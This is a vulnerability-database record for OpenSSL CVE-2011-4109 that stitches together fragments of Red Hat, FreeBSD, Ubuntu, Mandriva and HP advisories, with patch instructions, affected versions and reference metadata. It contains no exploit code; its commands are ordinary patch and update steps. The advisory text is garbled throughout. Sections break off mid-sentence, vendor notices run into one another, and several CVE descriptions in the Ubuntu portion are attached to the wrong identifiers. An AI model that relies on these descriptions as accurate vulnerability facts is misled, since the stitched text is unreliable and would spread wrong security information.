(GNU/Linux)\n\niD8DBQFPQ1yHXlSAg2UNWIIRAl9/AJ9JmPpSO5U2xwDBKDZA8y5To8EVcwCfZFGN\nbzF952CZ/r5T3LUF9kY6X8c=\n=IdNq\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-12:01.openssl Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSL multiple vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2012-05-03\nCredits: Adam Langley, George Kadianakis, Ben Laurie,\n Ivan Nestlerode, Tavis Ormandy\nAffects: All supported versions of FreeBSD. \nCorrected: 2012-05-03 15:25:11 UTC (RELENG_7, 7.4-STABLE)\n 2012-05-03 15:25:11 UTC (RELENG_7_4, 7.4-RELEASE-p7)\n 2012-05-03 15:25:11 UTC (RELENG_8, 8.3-STABLE)\n 2012-05-03 15:25:11 UTC (RELENG_8_3, 8.3-RELEASE-p1)\n 2012-05-03 15:25:11 UTC (RELENG_8_2, 8.2-RELEASE-p7)\n 2012-05-03 15:25:11 UTC (RELENG_8_1, 8.1-RELEASE-p9)\n 2012-05-03 15:25:11 UTC (RELENG_9, 9.0-STABLE)\n 2012-05-03 15:25:11 UTC (RELENG_9_0, 9.0-RELEASE-p1)\nCVE Name: CVE-2011-4576, CVE-2011-4619, CVE-2011-4109,\n CVE-2012-0884, CVE-2012-2110\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. This could include\nsensitive contents of previously freed memory. [CVE-2011-4109]\n\nA weakness in the OpenSSL PKCS #7 code can be exploited using\nBleichenbacher\u0027s attack on PKCS #1 v1.5 RSA padding also known as the\nmillion message attack (MMA). [CVE-2012-0884]\n\nThe asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp\nfunctions, in OpenSSL contains multiple integer errors that can cause\nmemory corruption when parsing encoded ASN.1 data. This error can occur\non systems that parse untrusted ASN.1 data, such as X.509 certificates\nor RSA public keys. [CVE-2012-2110]\n\nIII. Impact\n\nSensitive contents of the previously freed memory can be exposed\nwhen communicating with a SSL 3.0 peer. However, FreeBSD OpenSSL\nversion does not support SSL_MODE_RELEASE_BUFFERS SSL mode and\ntherefore have a single write buffer per connection. That write buffer\nis partially filled with non-sensitive, handshake data at the beginning\nof the connection and, thereafter, only records which are longer than\nany previously sent record leak any non-encrypted data. This, combined\nwith the small number of bytes leaked per record, serves to limit to\nseverity of this issue. [CVE-2011-4619]\n\nThe double-free, when an application performs X509 certificate policy\nchecking, can lead to denial of service in that application. \n[CVE-2011-4109]\n\nA weakness in the OpenSSL PKCS #7 code can lead to a successful\nBleichenbacher attack. Only users of PKCS #7 decryption operations are\naffected. A successful attack needs on average 2^20 messages. In\npractice only automated systems will be affected as humans will not be\nwilling to process this many messages. SSL/TLS applications are not\naffected. [CVE-2012-0884]\n\nThe vulnerability in the asn1_d2i_read_bio() OpenSSL function can lead\nto a potentially exploitable attack via buffer overflow. The SSL/TLS\ncode in OpenSSL is not affected by this issue, nor are applications\nusing the memory based ASN.1 functions. There are no applications in\nFreeBSD base system affected by this issue, though some 3rd party\nconsumers of these functions might be vulnerable when processing\nuntrusted ASN.1 data. [CVE-2012-2110]\n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE or 9-STABLE,\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, RELENG_9_0\nsecurity branch dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to FreeBSD 7.4, 8.3,\n8.2, 8.1, and 9.0 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-12:01/openssl.patch\n# fetch http://security.FreeBSD.org/patches/SA-12:01/openssl.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system as described in\n\u003cURL: http://www.freebsd.org/handbook/makeworld.html\u003e and reboot the\nsystem. \n\nNOTE: Any third-party applications, including those installed from the\nFreeBSD ports collection, which are statically linked to libcrypto(3)\nshould be recompiled in order to use the corrected code. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE or\n9.0-RELEASE on the i386 or amd64 platforms can be updated via the\nfreebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nVI. Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nCVS:\n\nBranch Revision\n Path\n- - -------------------------------------------------------------------------\nRELENG_7\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.2.2\n src/crypto/openssl/crypto/mem.c 1.1.1.8.2.2\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.1.1.1.2.2\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.1.1.2.2.2\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.2.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.1.1.4.2.2\n src/crypto/openssl/ssl/ssl_err.c 1.1.1.11.2.3\n src/crypto/openssl/ssl/s3_srvr.c 1.1.1.17.2.7\n src/crypto/openssl/ssl/ssl.h 1.1.1.16.2.3\n src/crypto/openssl/ssl/s3_enc.c 1.1.1.13.2.2\n src/crypto/openssl/ssl/ssl3.h 1.1.1.6.2.2\nRELENG_7_4\n src/UPDATING 1.507.2.36.2.9\n src/sys/conf/newvers.sh 1.72.2.18.2.12\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.2.1.2.1\n src/crypto/openssl/crypto/mem.c 1.1.1.8.2.1.2.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.1.1.1.2.1.2.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.1.1.2.2.1.2.1\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.20.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.1.1.4.2.1.2.1\n src/crypto/openssl/ssl/ssl_err.c 1.1.1.11.2.2.2.1\n src/crypto/openssl/ssl/s3_srvr.c 1.1.1.17.2.5.2.1\n src/crypto/openssl/ssl/ssl.h 1.1.1.16.2.2.2.1\n src/crypto/openssl/ssl/s3_enc.c 1.1.1.13.2.1.2.1\n src/crypto/openssl/ssl/ssl3.h 1.1.1.6.2.1.2.1\nRELENG_8\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.2\n src/crypto/openssl/crypto/mem.c 1.2.2.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.2.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.2\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.10.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.2.2.1\n src/crypto/openssl/ssl/ssl_err.c 1.2.2.2\n src/crypto/openssl/ssl/s3_srvr.c 1.3.2.5\n src/crypto/openssl/ssl/ssl.h 1.2.2.2\n src/crypto/openssl/ssl/s3_enc.c 1.2.2.2\n src/crypto/openssl/ssl/ssl3.h 1.2.2.2\nRELENG_8_3\n src/UPDATING 1.632.2.26.2.3\n src/sys/conf/newvers.sh 1.83.2.15.2.5\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.1.4.1\n src/crypto/openssl/crypto/mem.c 1.2.14.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.14.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.6.1\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.26.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.2.14.1\n src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.6.1\n src/crypto/openssl/ssl/s3_srvr.c 1.3.2.4.2.1\n src/crypto/openssl/ssl/ssl.h 1.2.2.1.6.1\n src/crypto/openssl/ssl/s3_enc.c 1.2.2.1.4.1\n src/crypto/openssl/ssl/ssl3.h 1.2.2.1.6.1\nRELENG_8_2\n src/UPDATING 1.632.2.19.2.9\n src/sys/conf/newvers.sh 1.83.2.12.2.12\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.1.2.1\n src/crypto/openssl/crypto/mem.c 1.2.8.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.8.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.4.1\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.18.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.2.8.1\n src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.4.1\n src/crypto/openssl/ssl/s3_srvr.c 1.3.2.3.2.1\n src/crypto/openssl/ssl/ssl.h 1.2.2.1.4.1\n src/crypto/openssl/ssl/s3_enc.c 1.2.2.1.2.1\n src/crypto/openssl/ssl/ssl3.h 1.2.2.1.4.1\nRELENG_8_1\n src/UPDATING 1.632.2.14.2.12\n src/sys/conf/newvers.sh 1.83.2.10.2.13\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.16.1\n src/crypto/openssl/crypto/mem.c 1.2.6.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.6.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.2.1\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.16.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.2.6.1\n src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.2.1\n src/crypto/openssl/ssl/s3_srvr.c 1.3.2.2.2.1\n src/crypto/openssl/ssl/ssl.h 1.2.2.1.2.1\n src/crypto/openssl/ssl/s3_enc.c 1.2.6.1\n src/crypto/openssl/ssl/ssl3.h 1.2.2.1.2.1\nRELENG_9\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.2.2.1\n src/crypto/openssl/crypto/mem.c 1.2.10.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.10.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.3.2.1\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.22.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.2.10.1\n src/crypto/openssl/ssl/ssl_err.c 1.3.2.1\n src/crypto/openssl/ssl/s3_srvr.c 1.7.2.1\n src/crypto/openssl/ssl/ssl.h 1.3.2.1\n src/crypto/openssl/ssl/s3_enc.c 1.3.2.1\n src/crypto/openssl/ssl/ssl3.h 1.3.2.1\nRELENG_9_0\n src/UPDATING 1.702.2.4.2.3\n src/sys/conf/newvers.sh 1.95.2.4.2.5\n src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.2.4.1\n src/crypto/openssl/crypto/mem.c 1.2.12.1\n src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.12.1\n src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.3.4.1\n src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.24.1\n src/crypto/openssl/crypto/buffer/buffer.c 1.2.12.1\n src/crypto/openssl/ssl/ssl_err.c 1.3.4.1\n src/crypto/openssl/ssl/s3_srvr.c 1.7.4.1\n src/crypto/openssl/ssl/ssl.h 1.3.4.1\n src/crypto/openssl/ssl/s3_enc.c 1.3.4.1\n src/crypto/openssl/ssl/ssl3.h 1.3.4.1\n- - -------------------------------------------------------------------------\n\nSubversion:\n\nBranch/path Revision\n- - -------------------------------------------------------------------------\nstable/7/ r234954\nreleng/7.4/ r234954\nstable/8/ r234954\nreleng/8.3/ r234954\nreleng/8.2/ r234954\nreleng/8.1/ r234954\nstable/9/ r234954\nreleng/9.0/ r234954\n- - -------------------------------------------------------------------------\n\nVII. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-1357-1\nFebruary 09, 2012\n\nopenssl vulnerabilities\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.10\n- Ubuntu 10.04 LTS\n- Ubuntu 8.04 LTS\n\nSummary:\n\nMultiple vulnerabilities exist in OpenSSL that could expose\nsensitive information or cause applications to crash. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) binary and related cryptographic tools\n\nDetails:\n\nIt was discovered that the elliptic curve cryptography (ECC) subsystem\nin OpenSSL, when using the Elliptic Curve Digital Signature Algorithm\n(ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement\ncurves over binary fields. This could allow an attacker to determine\nprivate keys via a timing attack. This issue only affected Ubuntu 8.04\nLTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)\n\nAdam Langley discovered that the ephemeral Elliptic Curve\nDiffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread\nsafety while processing handshake messages from clients. This issue only\naffected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu\n11.04. This could allow a remote\nattacker to recover plaintext. (CVE-2011-4108)\n\nAntonio Martin discovered that a flaw existed in the fix to address\nCVE-2011-4108, the DTLS MAC check failure. This\nissue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. (CVE-2011-4109)\n\nIt was discovered that OpenSSL, in certain circumstances involving\nECDH or ECDHE cipher suites, used an incorrect modular reduction\nalgorithm in its implementation of the P-256 and P-384 NIST elliptic\ncurves. This issue only\naffected Ubuntu 8.04 LTS. (CVE-2011-4576)\n\nAndrew Chi discovered that OpenSSL, when RFC 3779 support is enabled,\ncould trigger an assert when handling an X.509 certificate containing\ncertificate-extension data associated with IP address blocks or\nAutonomous System (AS) identifiers. (CVE-2011-4619)\n\nAndrey Kulikov discovered that the GOST block cipher engine in OpenSSL\ndid not properly handle invalid parameters. This could allow a remote\nattacker to cause a denial of service via crafted data from a TLS\nclient. This issue only affected Ubuntu 11.10. (CVE-2012-0027)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 11.10:\n libssl1.0.0 1.0.0e-2ubuntu4.2\n openssl 1.0.0e-2ubuntu4.2\n\nUbuntu 11.04:\n libssl0.9.8 0.9.8o-5ubuntu1.2\n openssl 0.9.8o-5ubuntu1.2\n\nUbuntu 10.10:\n libssl0.9.8 0.9.8o-1ubuntu4.6\n openssl 0.9.8o-1ubuntu4.6\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.8\n openssl 0.9.8k-7ubuntu8.8\n\nUbuntu 8.04 LTS:\n libssl0.9.8 0.9.8g-4ubuntu3.15\n openssl 0.9.8g-4ubuntu3.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Relevant releases/architectures:\n\nRHEL Desktop Workstation (v. 5 server) - i386, ia64, ppc, s390x, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\n\n3. \n\nIt was discovered that the Datagram Transport Layer Security (DTLS)\nprotocol implementation in OpenSSL leaked timing information when\nperforming certain operations. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted. Bugs fixed (http://bugzilla.redhat.com/):\n\n771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack\n771771 - CVE-2011-4109 openssl: double-free in policy checks\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n\n6. 5 client):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/openssl-0.9.8e-20.el5_7.1.src.rpm\n\ni386:\nopenssl-0.9.8e-20.el5_7.1.i386.rpm\nopenssl-0.9.8e-20.el5_7.1.i686.rpm\nopenssl-debuginfo-0.9.8e-20.el5_7.1.i386.rpm\nopenssl-debuginfo-0.9.8e-20.el5_7.1.i686.rpm\nopenssl-perl-0.9.8e-20.el5_7.1.i386.rpm\n\nx86_64:\nopenssl-0.9.8e-20.el5_7.1.i686.rpm\nopenssl-0.9.8e-20.el5_7.1.x86_64.rpm\nopenssl-debuginfo-0.9.8e-20.el5_7.1.i686.rpm\nopenssl-debuginfo-0.9.8e-20.el5_7.1.x86_64.rpm\nopenssl-perl-0.9.8e-20.el5_7.1.x86_64.rpm\n\nRHEL Desktop Workstation (v. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFPFFiBmqjQ0CJFipgRAkIUAJ9foScZELNgGkHUEaaSx9sgdWNMFwCgnsst\neph27yO3eEECVX28+SNUKyw=\n=wTFq\n-----END PGP SIGNATURE-----\n. \n\nRelease Date: 2012-01-19\nLast Updated: 2012-01-19\n\n ------------------------------------------------------------------------------\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized access\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3\nCVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided upgrades to resolve this vulnerability. \nThe upgrades are available from the following location\nftp://ossl098s:Secure12@ftp.usa.hp.com\n\nHP-UX Release / Depot Name\n\nB.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08s or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) 19 January 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in the title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2011-4109" }, { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "VULMON", "id": "CVE-2011-4109" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "112452" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109055" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109073" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#737740", "trust": 2.2 }, { "db": "NVD", "id": "CVE-2011-4109", "trust": 2.2 }, { "db": "SECUNIA", "id": "48528", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "BID", "id": "51281", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2011-4109", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116824", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110012", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "112452", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109614", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109055", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109073", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4109" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "112452" }, { "db": "PACKETSTORM", "id": "109614" }, { "db": "PACKETSTORM", "id": "109055" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109073" }, { "db": "NVD", "id": "CVE-2011-4109" } ] }, "id": "VAR-201201-0170", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-23T21:46:58.960000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2017/07/29/us_voting_machines_hacking/" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120060 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: CVE-2011-4354: OpenSSL 0.9.8g (32-bit builds) bug leaks ECC private keys", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ea25fd33228ddfe870d0eb9177265369" }, { "title": "Debian CVElist Bug Report Logs: Potential DTLS crasher bug", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=42b9da1ce27bbcacbdb9142890b6ad6b" }, { "title": "Debian Security Advisories: DSA-2390-1 openssl -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e583d2cd94d02b09eb008edba3c25e28" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1357-1" }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4109" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4109" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.6, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1307.html" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1308.html" }, { "trust": 1.5, "url": "http://www.kb.cert.org/vuls/id/737740" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory3.asc" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2012-1306.html" }, { "trust": 1.4, "url": "http://support.apple.com/kb/ht5784" }, { "trust": 1.1, "url": "http://w3.efi.com/fiery" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:006" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:007" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00018.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/48528" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=134039053214295\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=132750648501816\u0026w=2" }, { "trust": 1.1, "url": "http://www.debian.org/security/2012/dsa-2390" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00000.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72129" }, { "trust": 0.8, "url": "http://www.support.xerox.com/support/docucolor-242-252-260/downloads/enus.html?associatedproduct=fiery-exp260\u0026operatingsystem=win7x64" }, { "trust": 0.8, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.8, "url": 